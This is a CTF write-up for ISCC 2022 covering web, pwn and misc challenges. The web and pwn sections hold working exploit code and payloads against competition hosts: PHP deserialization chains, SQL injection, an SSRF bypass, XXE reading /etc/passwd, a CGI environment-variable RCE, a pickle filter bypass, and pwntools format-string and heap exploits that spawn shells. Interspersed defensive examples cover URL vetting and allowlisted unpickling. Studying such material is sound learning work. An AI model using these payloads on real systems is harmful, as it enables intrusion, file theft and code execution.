2022ISCC-web-wp

web

Winter Olympics

Pass in a JSON string whose first key is year, with a value that is not a number.

if(is_array(@$info["items"])){
    if(!is_array($info["items"][1])OR count($info["items"])!==3 ) die("Sorry~");
    $status = array_search("skiing", $info["items"]);
    $status===false?die("Sorry~"):NULL;
    foreach($info["items"] as $key=>$val){
      $val==="skiing"?die("Sorry~"):NULL;
    }
    $Step2=True;
  }

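The second key is items. The check relies on the search function returning "0" when it is given a value of a non-matching type, so a two-dimensional array is used to bypass it.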

poc

?Information={"year":"a","items":[0,[],"a"]}

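Patriotic and Dedicated Young People 2

May 10 is the 100th anniversary of the founding of the Communist Youth League, so the guessed coordinates are Tiananmen. Go to the /flag page and POST the longitude and latitude to get the flag.

POST body: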

lati=116%C2%B023%E2%80%B2E&langti=39%C2%B054%E2%80%B2N

Pop2022

The target is the include call. A PHP wrapper (pseudo-protocol) can be used to read and output the file.

poc:

<?php 
class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        //echo 'Road_is_Long__construct';
        $this->page = $file;
    }
    public function __toString(){
        echo '__toString';
        return $this->string->page;
    }

    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}
class Try_Work_Hard{
    protected  $var='php://filter/read=convert.base64-encode/resource=/flag.php';
    public function append($value){
        echo 'append';
        include($value);
    }
    public function __invoke(){
        echo '__invoke';
        $this->append($this->var);
    }
} 
class Make_a_Change{
    public $effort;
    public function __construct(){
        //echo 'Make_a_Change__construct';
        $this->effort = array();
    }

    public function __get($key){
        echo '__get';
        $function = $this->effort;
        return $function();
    }
}

$a=new Road_is_Long();
$b=new Road_is_Long();
$c=new Make_a_Change();
$d=new Try_Work_Hard(); 
$c->effort=$d;
$b->string=$c;
$a->page=$b;
echo urlencode(serialize($a)); 
?>

ISCC{lets_pop_your_2022}

Easy-SQL

?id=-8 union table emails limit 7,1#

This yields the source code.

When a UNION query selects data that does not exist, the UNION constructs a virtual row.

username=0' union select 1,0x61646d696e,3#&passwd=3

findme

A simple exploitation of PHP native (built-in) classes.

http://59.110.159.206:8030/unser.php

First use the wrapper to fetch hint.php, which shows roughly where the flag is.

<?php

class a{
    public $un0;
    public $un1;
    public $un2="php://filter/convert.base64-encode/resource=";
    public $un3;
    public $un4;

}

$payload=new a();
echo serialize($payload);

Then send the PoC directly to get the flag file.

<?php

class a{
    public $un0="DirectoryIterator";
    public $un1="glob:///var/www/html/f*.txt";
    public $un2;
    public $un3="unserialize";
    public $un4="abc";

}

$a=new a();
echo serialize($a);

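Let Me Take a Look!

There is a search box and a hint telling us to visit the fl4g page; visiting it returns a 403 page. We try to reach fl4g through an HTTP request smuggling vulnerability, and the response says the request must come from localhost.

Using the search box, we find that the request as rewritten by the front end is reflected in the response. The data has to be submitted via POST with the CT field added. Through the request smuggling vulnerability we obtain the name of the field the front-end server uses to specify the source IP, so we can pose as a local user.

Finally we get the flag.

This Is a Code Audit Challenge

Visit index with the request parameter url=1 to get an error page, then view its source.

Visit this file; it contains source code encoded as emoji.

Decode it to obtain the source code: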

def geneSign():
    if(control_key==1):
        return render_template("index.html")
    else:
        return "You have not access to this page!"

def check_ssrf(url):
    hostname = urlparse(url).hostname
    try:
        if not re.match('https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
            if not re.match('https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
                raise BaseException("url format error")
        if  re.match('https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
            if judge_ip(hostname):
                return True
            return False, "You not get the right clue!"
        else:
            ip_address = socket.getaddrinfo(hostname,'http')[0][4][0]
            if is_inner_ipaddress(ip_address):
                return False,"inner ip address attack"
            else:
                return False, "You not get the right clue!"
    except BaseException as e:
        return False, str(e)
    except:
        return False, "unknow error"

def ip2long(ip_addr):
    return struct.unpack("!L", socket.inet_aton(ip_addr))[0]

def is_inner_ipaddress(ip):
    ip = ip2long(ip)
    print(ip)
    return ip2long('127.0.0.0') >> 24 == ip >> 24 or ip2long('10.0.0.0') >> 24 == ip >> 24 or ip2long('172.16.0.0') >> 20 == ip >> 20 or ip2long('192.168.0.0') >> 16 == ip >> 16 or ip2long('0.0.0.0') >> 24 == ip >> 24

def waf1(ip):
    forbidden_list = [ '.', '0', '1', '2', '7']
    for word in forbidden_list:
        if ip and word:
            if word in ip.lower():
                return True
    return False

def judge_ip(ip):
    if(waf1(ip)):
        return Fasle
    else:
        addr = addr.encode(encoding = "utf-8")
        ipp = base64.encodestring(addr)
        ipp = ipp.strip().lower().decode()
        if(ip==ipp):
            global control_key
            control_key = 1
            return True
        else:
            return False

Construct the request http://59.110.159.206:8040/index?url=https://@MTI3LjAuMC4x

This bypasses the SSRF restriction and returns a new hint.
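
For comparison with the decoded `check_ssrf` / `is_inner_ipaddress` above, here is an added example (not part of the original writeup or the challenge code) of how a server-side fetcher can vet a URL: it rejects any userinfo (`@`) in the authority, resolves the host, and classifies every resolved address with the standard `ipaddress` module. The names `check_url`, `is_internal`, `sample_resolver` and the `*.example` DNS table are assumptions made for the illustration.

```python
import ipaddress
import socket
import struct
from urllib.parse import urlsplit


def ip2long(ip_addr):
    return struct.unpack("!L", socket.inet_aton(ip_addr))[0]


def page_is_inner_ipaddress(ip):
    """The shift-based check from the decoded source, kept for comparison."""
    ip = ip2long(ip)
    return (ip2long('127.0.0.0') >> 24 == ip >> 24
            or ip2long('10.0.0.0') >> 24 == ip >> 24
            or ip2long('172.16.0.0') >> 20 == ip >> 20
            or ip2long('192.168.0.0') >> 16 == ip >> 16
            or ip2long('0.0.0.0') >> 24 == ip >> 24)


def is_internal(ip_text):
    """True for any address a server-side fetch should not be sent to."""
    ip = ipaddress.ip_address(ip_text.split("%", 1)[0])  # drop IPv6 scope id
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 is really 127.0.0.1
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified
            or not ip.is_global)


def system_resolver(hostname):
    """Default resolver: every address the name currently maps to."""
    infos = socket.getaddrinfo(hostname, None, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0] for info in infos})


def check_url(url, resolver=system_resolver):
    """Return (ok, detail). On success detail is the list of vetted IPs;
    the caller should connect to one of them rather than resolve again."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    if "@" in parts.netloc:
        # userinfo is never needed here and confuses regex-based filters
        return False, "userinfo not allowed"
    if not parts.hostname:
        return False, "missing host"
    try:
        addresses = resolver(parts.hostname)
    except OSError:
        return False, "resolution failed"
    if not addresses:
        return False, "resolution failed"
    for addr in addresses:
        # one internal record is enough to reject the whole name
        if is_internal(addr):
            return False, "internal address: " + addr
    return True, addresses


# Constructed DNS table so the example runs offline (not real records).
SAMPLE_DNS = {
    "public.example": ["8.8.8.8"],
    "intranet.example": ["8.8.8.8", "10.0.0.5"],
    "metadata.example": ["169.254.169.254"],
    "mapped.example": ["::ffff:127.0.0.1"],
}


def sample_resolver(hostname):
    try:
        return SAMPLE_DNS[hostname]
    except KeyError:
        raise OSError("no such host") from None


if __name__ == "__main__":
    for url in ("https://@MTI3LjAuMC4x", "http://public.example/x",
                "http://intranet.example/", "http://metadata.example/",
                "http://mapped.example/"):
        print(url, "->", check_url(url, sample_resolver))
    # The page's shift-based check does not cover link-local addresses:
    print(page_is_inner_ipaddress("169.254.169.254"),
          is_internal("169.254.169.254"))
```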

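Visit this directory, intercept the request, and change the cookie to the one given by the challenge.

This leads to a login form. Right-click and view the page source to find a piece of JavaScript.

Clearly we are expected to craft a POST request; there is an XXE vulnerability. The request is constructed as follows: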

POST /mti3ljaumc4x/codelogin HTTP/1.1
Host: 59.110.159.206:8040
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: td_cookie=2450783275;login=1; a_cookie=aW4gZmFjdCBjb29raWUgaXMgdXNlZnVsIQ==
Upgrade-Insecure-Requests: 1
Content-Type: application/xml;charset=utf-8
Content-Length: 172

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY name SYSTEM "file:///etc/passwd">
  ]>
<user><name>&name;</name><password>admin</password></user>

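The file is read successfully.

Following the hint, use the proc filesystem: proc/self/cwd/ gives the working directory of the target's current process and the files in that directory.

Read proc/self/cwd/flag.txt to get the flag.

ping2rce

RCE through environment variables; see p牛's article at https://tttang.com/archive/1450/. Constructing the PoC directly gives command execution.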

POST /cgi-bin/ping?ip=127.0.0.1 HTTP/1.1
Host: 59.110.159.206:8010
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 152
Content-Type: multipart/form-data; boundary=cf7fc1d68a5861b16bd95126c45ba379

--cf7fc1d68a5861b16bd95126c45ba379
Content-Disposition: form-data; name="BASH_FUNC_ping%%"

() { cat /flag; }
--cf7fc1d68a5861b16bd95126c45ba379--

Melody

First log in as any user; you can see that session authentication is in use.

eyJ1c2VybmFtZSI6ImFkbWluMSJ9.Ym89BA.cTzCdduJBZkB49voYggktxppsnI

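A hint says the /info page must be accessed with the Melody browser; changing the User-Agent header to Melody is enough.

We find a Jinja2 template injection. Dumping the configuration reveals the session key, so next we can simply forge the session.

Obtained key: meldoy-is-so-cute-wawawa!

Then use a script to forge the Flask session; after replacing the session, login succeeds.

The flag shown is fake, but a .py source file is found; visit it to download.

The code is as follows: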

# -*- coding:utf-8 -*-
import pickle
import melody
import base64
from flask import Flask, Response,request

class register:
    def __init__(self,name,password):
        self.name = name
        self.password = password

    def __eq__(self, other):
        return type(other) is register and self.name == other.name and self.password == other.password

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module[0:8] == '__main__':
            return getattr(sys.modules['__main__'],name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

def find(s):
    return RestrictedUnpickler(io.BytesIO(s)).load()

@app.route('/therealflag', methods=['GET','POST'])
def realflag():
    if request.method == 'POST':
        try:
            data = request.form.get('melody')
            if b'R' in base64.b64decode(data):
                return 'no reduce'
            else:
                result = find(base64.b64decode(data))
                if type(result) is not register:
                    return 'The type is not correct!'
            correct = ((result == register(melody.name,melody.password))&(result == register("melody","hug")))
            if correct:
                if session['username'] == 'admin':
                    return Response(read('./flag.txt'))
                else:
                    return Response("You're not admin!")
        except Exception as e:
            return Response(str(e))

    test = register('admin', '123456')
    data = base64.b64encode(pickle.dumps(test)).decode()
    return Response(data)

This is pickle deserialization. Write a script, using pker, to overwrite the original variables.

import base64
payload=b"c__main__\nmelody\n(S'name'\nS'melody'\nS'hug'\nS'2'\ndb0(c__main__\nregister\nS'melody'\nS'hug'\no."
print(base64.b64encode(payload))
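
The following added example (not part of the original writeup or the challenge source) shows why the `b'R'` filter and the `__main__`-prefix `find_class` in the code above do not constrain a pickle, and what a stricter loader looks like: the opcodes and globals of the payload above are listed statically with `pickletools`, and an unpickler resolves only an exact allowlist. `AllowlistUnpickler`, `safe_loads`, `referenced_globals` and the sample byte strings other than the page's payload are assumptions made for the illustration.

```python
import collections
import io
import pickle
import pickletools


class register:
    """Stand-in for the register class in the challenge source."""
    def __init__(self, name, password):
        self.name = name
        self.password = password

    def __eq__(self, other):
        return (type(other) is register and self.name == other.name
                and self.password == other.password)


# Exact (module, name) pairs that may be resolved, mapped to the object itself.
# Nothing else in __main__ (such as the imported melody module) is reachable.
ALLOWED_GLOBALS = {("__main__", "register"): register}


class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        try:
            return ALLOWED_GLOBALS[(module, name)]
        except KeyError:
            raise pickle.UnpicklingError(
                "global '%s.%s' is forbidden" % (module, name)) from None


def safe_loads(data):
    obj = AllowlistUnpickler(io.BytesIO(data)).load()
    if type(obj) is not register:
        raise pickle.UnpicklingError("unexpected top-level type")
    return obj


def is_rejected(data):
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


def page_filter_blocks(data):
    """The byte test used by the challenge: any 0x52 byte counts as REDUCE."""
    return b'R' in data


def opcodes_used(data):
    """Opcode names in a pickle, obtained without executing it."""
    return {op.name for op, _arg, _pos in pickletools.genops(data)}


def referenced_globals(data):
    """(module, name) pairs a pickle would import, obtained without loading."""
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":            # protocol 0-3: "module name"
            found.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":    # protocol 4+: two strings on the stack
            found.append(tuple(strings[-2:]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found


# The payload printed in the writeup above, used here only as scanner input.
PAGE_PAYLOAD = (b"c__main__\nmelody\n(S'name'\nS'melody'\nS'hug'\nS'2'\ndb0"
                b"(c__main__\nregister\nS'melody'\nS'hug'\no.")
# Constructed benign pickle whose data happens to contain the byte 'R'.
BENIGN_WITH_R = b"(c__main__\nregister\nS'Rose'\nS'x'\no."
# Constructed protocol-4 pickle to exercise the STACK_GLOBAL branch.
MODERN_SAMPLE = pickle.dumps(collections.OrderedDict(), protocol=4)

if __name__ == "__main__":
    print("byte filter blocks payload:", page_filter_blocks(PAGE_PAYLOAD))
    print("byte filter blocks benign :", page_filter_blocks(BENIGN_WITH_R))
    print("payload opcodes:", sorted(opcodes_used(PAGE_PAYLOAD)))
    print("payload globals:", referenced_globals(PAGE_PAYLOAD))
    print("allowlist rejects payload:", is_rejected(PAGE_PAYLOAD))
    print("allowlist accepts benign :", safe_loads(BENIGN_WITH_R).name)
```

Where the format is under the server's control, exchanging the two fields as JSON removes the need for an unpickler on untrusted input.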

pwn

create_id

A 32-bit program with a backdoor function, combined with a format string vulnerability.

from pwn import *
context.log_level = "debug"
io=remote('123.57.69.203',5310)
x = int(io.recvline(),16)
print(hex(x))
io.sendlineafter('You will get the user id after you finish it.\n',str(1))
io.sendlineafter('incorrect\n',str(1))
io.sendlineafter('incorrect\n',str(1))
payload = fmtstr_payload(10, {x:9})
io.sendlineafter('your name?\n',payload)
io.interactive()

sim_treasure

Format string, no PIE: leak an address, then overwrite the GOT.

from pwn import *
context.log_level='debug'
io=remote("123.57.69.203",7010)
elf = ELF("./sp1")
libc = ELF("./libc-2.27.so")
puts_got = elf.got['puts']
payload1 = p32(elf.got["puts"])+"%6$s"    
io.sendlineafter('Can you find the magic word?\n',payload1)
puts_addr = u32(io.recvuntil('\xf7')[-4:])
printf_got = elf.got['printf']
libc_base = puts_addr - libc.symbols['puts']
system_addr = libc_base + libc.symbols['system']
io.sendline("A")
payload2 = fmtstr_payload(6, {printf_got: system_addr})
io.sendlineafter('A\n',payload2)
io.sendline("/bin/sh\x00")
io.interactive()

Jump Jump

Stack overflow; several addresses and the canary have to be leaked. The characters - and + are recognized by %hhd, but nothing is read in.

from pwn import *
from LibcSearcher import *
context.log_level="debug"
def ret2(leak, func, path=''):
    if path == '':
        libc = LibcSearcher(func, leak)
        base = leak - libc.dump(func)
        system = base + libc.dump('system')
        binsh = base + libc.dump('str_bin_sh')
    else:
        libc = ELF(path)
        base = leak - libc.sym[func]
        system = base + libc.sym['system']
        binsh = base + libc.search('/bin/sh').next()
    return (system, binsh)
io=remote('123.57.69.203',7020)
libc=ELF('./attachment-10')
io.recvuntil('~~\n')
for i in range(0x58):
    io.sendline('11')
for i in range(0x6):
    io.sendline('-')
for i in range(0x4a):
    io.sendline('11')
for i in range(0x6):
    io.sendline('-')
for i in range(0x1a):
    io.sendline('11')
for i in range (0x6):
    io.sendline('-')
for i in range(2): 
    io.sendline('11')
for i in range(6):
    io.sendline('-')
for i in range(0x3):
    io.sendline('21')
io.send('a')
leak_data=io.recv()
io_stderr_addr=u64(leak_data[0x67:0x6d].ljust(8,'\x00'))
setbuffer_addr=u64(leak_data[0xb7:0xbd].ljust(8,'\x00'))-231
libc_base=io_stderr_addr-0x3ec680
base=u64(leak_data[0xd7:0xdd].ljust(8,'\x00'))-0x10a0
leak_stack=u64(leak_data[0xdf:0xe5].ljust(8,'\x00'))
canary=u64(leak_data[0xe8:0xef].rjust(8,'\x00'))
result=ret2(setbuffer_addr,'setbuffer')
sys_addr=result[0]
bin_sh_addr=result[1]
pop_rdi_addr=base+0x130b
leave_addr=base+0x124a
payload=p64(pop_rdi_addr)+p64(bin_sh_addr)+p64(sys_addr)
payload=payload.ljust(0xd8,'a')
payload+=p64(canary)+p64(leak_stack-0x1d0-8)+p64(leave_addr)
io.sendline(payload)
io.interactive()

unlink

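Overwrite the strcmp GOT entry to reach the backdoor function, then supply the argument, which the backdoor parses automatically.

The vulnerable function is gets; use a heap overflow.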

from pwn import *

context.log_level='debug'
io=remote('123.57.69.203','5810')
elf = ELF('./pwn')
def addent(index,size,data):
    io.sendline('addent')
    io.sendlineafter('Index: ',str(index))
    io.sendlineafter('Size: ',str(size))
    io.sendlineafter('Data: ',data)
def delete(index):
    io.sendline('remove')
    io.sendlineafter('Index: ',str(index))
strncmp_got = elf.got['strncmp']
addent(0,0x70,'')
addent(1,0x40,'')
addent(2,0x50,'')
addent(3,0xf0,'') 
delete(0)
delete(2)
delete(1)
addent(0,0x70,'a'*0x70+p64(0)+p64(0x51)+p64(strncmp_got))
addent(1,0x50,p64(strncmp_got))
addent(1,0x50,p64(0x400896))
io.sendline('/bin/sh')
io.interactive()

untidy_note

UAF and heap overflow; chunks may not be larger than 0x20.

from pwn import *
context.log_level = "debug"
p = remote('123.57.69.203',7030)
libc =ELF('./libc-2.27.so')
def sa(delim,data):
    p.sendafter(str(delim), str(data))
def sla(delim,data):
    p.sendlineafter(str(delim), str(data))
def sl(data):
    p.sendline(str(data))
def itr():
    p.interactive()
def dbg():
    gdb.attach(p)
    pause()
def add(size):
    sla('Your choose is:\n',str(1))
    sla('the note size is:\n',size)
def delete(index):
    sla('Your choose is:\n',str(2))
    sla('index:\n',index)
def edit(index,size,content):
    sla('Your choose is:\n',str(3))
    sla('index:\n',index)
    sla('the size is:\n',size)
    sa('Content:\n',content)
def show(index):
    sla('Your choose is:\n',str(4))
    sla('index:\n',index)
sl('111')
for i in range(7):
    add(0x10)
delete(0)
delete(1)
show(1)
p.recvuntil("Content:")
heap=u64(p.recv(6)+'\x00'*2)-0x250
print(hex(heap))
edit(0,0x10,p64(heap))
add(0x10)
add(0x10)
add(0x10)
add(0x10)
add(0x10)
edit(7,0x20,p64(0)*4)
delete(5)
edit(5,0x10,p64(heap+0x20))
add(0x10)
add(0x10)
edit(10,0x20,p64(0x0000000007000000))
delete(7)
add(0x10)
show(10)
p.recvuntil("Content:")
base=u64(p.recv(6)+'\x00'*2)-0x3ebca0-0x240
print('base:'+hex(base))
free=base+libc.sym['__free_hook']
system=base+libc.sym['system']
print(hex(system))
edit(10,0x20,p64(0)*4)
delete(10)
edit(10,0x20,p64(free))
add(0x10)
add(0x10)
edit(11,0x10,p64(system))
edit(10,0x10,"/bin/sh\x00")
delete(10)
itr()

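misc

2022 Winter Olympics

Guess that the archive password is 灯笼 (lantern); extracting gives the flag.

Snowboard Prodigy Su Yiming

Change the image width and height to reveal a QR code; scan it to get the password.

The password is: total medals, gold medals, silver medals, bronze medals. Archive password: 15942

Extract to get the flag.

Hidden Information

Base64-decoding the ciphertext given by the challenge yields the archive password; extracting gives an image.

Analyzing it with Stegsolve reveals hidden hexadecimal characters.

First convert them to a binary string.

Then convert to characters, deleting the first three 1s, to get the flag.

Poem Hidden in the Starry Sky-1

Open the file in Photoshop; adjusting the opacity reveals the order.

The order is 13524. Enter the patterns in that order as the WinRAR password to extract, then substitute the symbols in order using the table to get the flag.

Poem Hidden in the Starry Sky-2

First use the table from Poem Hidden in the Starry Sky-1 to convert the symbols to hex, then convert that to Unicode escapes; decoding gives the flag.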

flag="\🌟🌠🌠✴🟉\🌟🌠🌠★⍣\🌟🌠🌠✴⍣\🌟🌠🌠✴⍣\🌟🌠🌠✧≛\🌟🌠🌠⍣⍣\🌟🌠🌠✴🟉\🌟🌠🌠☆🟌\🌟🌠🌠⍣✴\🌟🌠🌠☆✯\🌟🌠🌠✧🌠\🌟🌠🌠✴≛\🌟🌠🌠✴🟌\🌟🌠🌠⍣☆\🌟🌠🌠⍣✴\🌟🌠🌠⍣✴\🌟🌠🌠✲☪\🌟🌠🌠★☆\🌟🌠🌠⍣☆\🌟🌠🌠✧⚝".replace("\🌟🌠🌠","")
flag_unicode_hex=[str(hex(ord(i))).upper() for i in flag if i!="\\"]
flag_unicode=""
for i in range(len(flag_unicode_hex)):
    if i%2==0:
        flag_unicode +="\\u00"+flag_unicode_hex[i][-1]
    else:
        flag_unicode+=flag_unicode_hex[i][-1]
print(flag_unicode)

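Dimensionality Reduction Strike

First use foremost to extract the file embedded in the image.

This gives a new image.

Then analyze the new image with zsteg (zsteg -a "b1,r,lsb,yx") and extract the hidden data (zsteg -a -E "b1,r,lsb,yx"), which gives an image of glyphs.

Look up the glyphs on this site to get the flag:

https://www.bilibili.com/read/cv8724055

ISCC{ZEDD-EJHM-KNVM}

Trap Within a Trap

Open the file in 010 Editor, change the file header to the PNG header, and modify the image height.

At the end of the file there is a Base64 string; decoding it gives flag2:_ISCC_Zo2z

Take a screenshot of the image, open the screenshot in Stegsolve, and cycle through the views to find flag1.

This gives the archive password: wELC0m3_T0_tH3_ISCC_Zo2z

Based on the extracted generator.py, write the following script; pubKey and encoded are the contents of the files extracted from the archive.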

pubKey = [  # integers from the extracted public-key file omitted
21979260423626821018489541432634891685215725203513830851598610785031805881508993329398466374053154095270019921311344755282533940013298535097200167881351776957252298149312359379466488394766334, 18835091260797073562570197337192687096149062471010909287505026739256851663845652546228812299453403369197090762437909361190694731343103307114750836735997823980817474260923309093351161826331851, 31741489402516148911633197695597953081401237503796854927240741326207504993089377049583728444407858426004232071134468398273396605006577855552656764382734524654277518570822875478167442638070901, 16050117042291126277677926822141336442372387354061686268361792054293011835387201560959594636149809378193176734175577918539778477385651844891098832581022035133541637266082160308042031860506989, 16379463477204913330055508893873729174739376880548770933003570470660499885606594386561420463061184588808230491183336279782405733295425571066874025844316939637315915343557140783536280314260190, 23058007636349322493533060888214863711857942288940601048898840019057943804724486110106459414627162992559209093285612285210308835967706195433862579974709778186744020858324991526063814823612287, 19497548104095059626306207887464394273778151478519542948752215627780389285194991470064485692362185896936181237881579479933106410836542916696923953216719052408411804666552233932131319571241763, 17632121136316990934955612215609500766435472016530990904203129722465440826062961881413835332832993132979526774745855028877553216518081174139693119715949034199141619868897050824712146245401588, 1871468487319968372908785904638027514106261889215980360019125483842603309636049187223167809902816215052058167498138766999050264473961232336492552974671621923732211039196537569962142516042355, 62926073061408568815305709546008876991925602654691545685161680583826362674827494368322825291911250082105230802573121612633252347575715105923975409004163278303768506104733416649687428519800752, 
65500365105957172579636962313973498672764577312979370212418478100944941884490065883379135454667686291049053276049947674376272785046831902692005131485978786748114625044420777348285369514422896, 39442084005803859743248651321324383868223256723271248941942941219329288135436852908442074189537390961087604110496233569348047766997496498099112587487212179108572289958814078996194165124356571, 28749645518483530181191626607360401710965005503452507585402702473101692981830330921977455897406578416614294892273156950031964192568883035130344623321903046909134347294496256397080491610449783, 59215486516688778254818458983882413560832323676510288447057843140104907059498699532075660384822833477717456618622107255774778427073278729948292838400614933795378669974510804626649421793785832, 38239266349865570890118308779334625251415166366089226198270068826789870291975773540805447014702851667297091330678993691371210077982768540678144457713502249064302773372842360541892860517005928, 10781869801098745922189009636686366741026376123099365671761874522828753309010095045974148776576101040476333187616026046251883938367061041869707334631470632264224458586898378761910988484407522, 44555661165298366621929077029890439918460348802513192503445343800607358749326722940430429144066972517739493904631128687734149376126254489721753894732678101106393312221317100067575618291906876, 66419168629567921834343053143841391733067579594096450584346524244338021419929728437472466918227931064432540911955687063794088879714385096689969461262536176954842293004546425098238106744967544, 53070736350010579101478261026664742633830440810518969293809356268130347073700238364938313884976128806691925379909738186549901426616348254114665071229526846834842533859242206037281011591036289, 22849589939655807391095873987864500357112477263503457235954254349498524812852403116832329056488396748162091885144551074568286219666156511990443897994844330670468980085373463662416383618461467, 
7180153334322933025085037204940906254349411631575887280143813253513754261470238096914777722623869792438427552448168780705532068475077894323728119245309544237160824439200585721645590166228420, 11482439014492604534559359091537077661618461698201369584284070129079518511868618757186994516752885928499921289354962724980964253578120911579146839767416018399357811759286441128701879257327409, 13340284240190076852801996978492272593934260994217650388686339010003533927947169352715971012947009755179237313888884967110512743624920673608875707982244817410379882924572291491377414280764504, 16319742011618547561318291933298747389763403441769656204941637523542180357712784347887893270400819572630615616460967210482111595184242129252734239196181783997489879602947364401095934436633840, 25245264191238070106632203778761096089815457066460589468863204041741021444830520840049730272302444433418401417213547796426097383885110343132458212248252538060762962376716059459828802790134118, 4569462007281085626344114509743551095912755602276157412382743883572282836905576946714633114678917034713786819842866758824276969427145784594847589758199664134223615366421110564305852166850756, 16222138934890360286734397616869346119188006403962150947344247922973455683049770004862573585016786313381016665646116773581837505032908893603036889177730855936060000638140423475038765571082437, 27536486649538589838877405800312664596659200874025350885626913317294289481742460638948156829376486168554629725395805255505979788662356489076920425846567848580616902117147138363914943128262868, 19660548836315869980577632085657144304460234727275696562095405800452804952270456690413464091827809646872415608257296548283420857426618514532827157035478615928221980512251880148725239045050572, 2935575951698898266032232265490012685304313227978895061964424259438886204380199162255685722119174179934665079343266063365713050997303256282211640759431768058030092561437103884802603110488026, 
15050391309067926582121418817448212157268553037114604384884318666136444999543717730382845372854181435979402248620494574452171618000054901482776133338676983233450693782357102727495150466680028, 15844239224848276396953918986430334242804023674203926124579340310286053504639009733470273287917036368416360132676495915311526874480593278206185756588598105157038681320484244707469227627438636, 60141538952334547131714083168714853189936401560162514615025382204736687748110514588745620090074870079766772161067031978039680771075103440185765155578539288563622621860106047359168162260844534, 45047381276471250981174619803556224475748621940824687575867936161420399614080749846164595911294933112671467207082180454047497664417895485437634278353614168990051094115123403717078196249807462, 63213628474195584088061650017856358607306056083424690128239046359606799520947289828953816760280214157198463731468395297879555219745776202587009614095816156557391728270483415956231481216684127, 47127670452411541823641342868939225861162646075398727586082968366329064652785940730549374132934052760090536352442764305603139737908099767454603464370232665245220297648297947630663865185956858, 27253024246190707296003159139128937539039294335558161543719274117695143050858801199381756277345531356352915974838147614765883773007952056088797078000243444232563774396178048368410683022243600, 58536339286803714222234300164727185302498750556527460206135534519254767876585761649566526890768447339045289107648373430624328699713491542596523037967861994155279091191591924807670592955011170, 57175551329982920356116680928451690094476558030201982262370861043678283259979647494102980609873273499338588744799175384224575598567727581411955085338869075971019893816832990408113023589210692, 1691228204126640565048609153105718816682391106279130954873266081535994803009983222071629038374948751966597853814710700984986351218672473434401054012842971444924818052453217913126056804136634, 
18259029928340107051612327899051598631621572170439491860737800320015828939423260018800103341952219448169798069021795590884245237859665920663962296060767687499992086244092229454910838687365523, 34275887125068602666708845519395025657705837555812683307610201684446869655870749876133358373069234049138641432900703496298668500973107970893808842807146663365267834946542177020935189486846663, 59478292605909585646382908673223430222120032595326349358553695541323907659346576450864085948860581917387406847299785962961771900629629458942186507337471890453270925234354360840846884207643024, 18471913267399338563212326631641044656181709708944323035056233436403418430332177915960100112418275886822971100478565428197902731068875657494263701867756491180732018002382889213400874919101437, 28419356783698622386038466787527804412812948444393147867606362906428208603221951008262562715703516257770939548500131732375680515310439957569029091346899056154440147332745840385444672517664872, 4708757448340822715920459148813728646061290570953127713098444568688336699702657954376259939408787111187863066857145859213594085300401029256265676556400548573084764170467918774885607183523407, 63035795145332257671110618754242812319412358745570179949829104657791665675480259338228488240452172475363993781946567214140071689730597091676924635337666041026748259004653243201003399276554500, 13189986625164442133210084295476894490640116756733531036044924355555127993186837134306976392035419483325751906098295742029817206682768342920654845357323042907301486682385483087515626774642983, 56479004843147047171593377125630572933044188348660633825638380537481087842510559431561593902889277909735622988511294737943589757547993119607061747602839484836518764277869991350077042440305063]
xbit = len(pubKey)
encoded =2639622584605651396581817251490032779454497426926835395155361491646809433696877389021382879271034071363673713244579933536498932208083160752102337857045696761077282255141184610061711587402657723
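A = Matrix(ZZ, xbit + 1, xbit + 1)
# knapsack lattice: identity block, public key in the last column, -ciphertext in the last row
for i in range(xbit):
    A[i, i] = 1
for i in range(xbit):
    A[i, xbit] = pubKey[i]
A[xbit, xbit] = -(encoded)

res = A.LLL()
for i in range(0, xbit + 1):
    B = res.row(i).list()
    flag = True
    # the solution row contains only 0/1 entries
    for m in B:
        if m != 0 and m != 1:
            flag = False
            break
    if flag:
        print (i, B)
        B = ''.join(str(j) for j in B)
        B = B[:-1]
        # [2:-1] strips "0x" and the trailing "L" of a Python 2 long;
        # under Python 3 use [2:], otherwise the last hex digit is lost
        B = hex(int(B, 2))[2:-1]
        print (B)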

Output:

495343437b527333432d7a4b4d352d704965657

Converting the hex string to characters gives the flag: ISCC{Rs3C-zKM5-pIee}

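There Is Only One Truth

After obtaining the attachment, change the file header of the dream file to the ZIP format, then change its extension to .zip

Extract it to get a text file, then run the steganography tool SNOW on it to get the flag

ISCC{iUHb-4q6M-1zMX}

Xiao Guang Learns AI

From the challenge description, the pixel sums reduce to a ratio x:y:z, i.e. they share a common multiplier, so we generate a dictionary and brute-force the password directly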

from tqdm import tqdm

filename = "password1.txt"
with open(filename, 'w') as f:
    # candidate passwords have the form i*l:j*l:k*l with i, j, k in 1..9
    for i in tqdm(range(1, 10)):
        for j in range(1, 10):
            for k in range(1, 10):
